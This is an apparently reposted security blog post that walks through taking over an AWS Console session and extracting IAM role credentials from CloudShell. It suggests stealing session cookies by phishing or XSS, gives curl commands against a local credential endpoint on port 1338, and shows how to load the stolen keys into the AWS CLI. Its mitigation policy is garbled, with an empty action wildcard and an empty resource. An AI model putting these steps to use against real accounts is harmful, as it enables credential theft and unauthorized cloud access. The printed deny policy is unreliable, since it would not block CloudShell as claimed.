Extracting IAM Credentials from AWS Console Session Using CloudShell

By /

Listen to this Post

Featured Image
Navigating AWS infrastructure during a penetration test can be challenging without direct credentials. However, if you gain AWS Console access via session cookies, you can extract IAM credentials using CloudShell by leveraging an undocumented endpoint on port 1338. This technique is invaluable when you need to run tools outside the console environment.

You Should Know:

Step-by-Step Exploitation Process

1. Access AWS Console via Session Cookies

  • Obtain session cookies (e.g., through phishing, XSS, or session hijacking).
  • Use browser dev tools (F12 → `Application` → Cookies) to extract:
    – `aws-userInfo`
    – `aws-creds`

2. Open CloudShell

  • Once inside the AWS Console, launch AWS CloudShell (available in the top navigation bar).

3. Extract IAM Credentials via Port 1338

  • CloudShell internally communicates with an undocumented API on localhost:1338.
  • Run the following command in CloudShell to retrieve temporary credentials: 
    curl http://localhost:1338/latest/meta-data/iam/security-credentials/
  • The response will include the IAM role name. Fetch credentials using: 
    curl http://localhost:1338/latest/meta-data/iam/security-credentials/<ROLE_NAME>

4. Use Extracted Credentials

  • Configure AWS CLI with the stolen credentials: 
    aws configure set aws_access_key_id <ACCESS_KEY>
aws configure set aws_secret_access_key <SECRET_KEY>
aws configure set aws_session_token <SESSION_TOKEN>
  • Verify access: 
    aws sts get-caller-identity

Mitigation & Detection

  • Enable CloudTrail Logging to monitor unusual CloudShell activity.
  • Restrict CloudShell Permissions using IAM policies: 
    {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Deny",
"Action": "cloudshell:",
"Resource": ""
}
]
}
  • Session Hardening: Enforce MFA and short-lived sessions.

What Undercode Say

This technique highlights a critical AWS security gap where session cookies can be weaponized to escalate privileges. Defenders must:
– Monitor CloudShell API calls in CloudTrail.
– Implement least privilege for IAM roles.
– Use AWS Session Manager instead of persistent sessions where possible.

Expected Output:

{
"AccessKeyId": "ASIAXXXXXXXXXXXX",
"SecretAccessKey": "XXXXXXXXXXXXXXXXXXXX",
"Token": "XXXXXXXXXXXXXXXXXXXX",
"Expiration": "2025-06-12T00:00:00Z"
}

Prediction

As AWS continues to expand its services, undocumented APIs and hidden endpoints will remain a prime target for attackers. Expect more research into CloudShell, AWS SSM, and Lambda as attack vectors.

Reference:

Get IAM Credentials from a Console Session – Hacking The Cloud

IT/Security Reporter URL:

Reported By: Hacking The – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: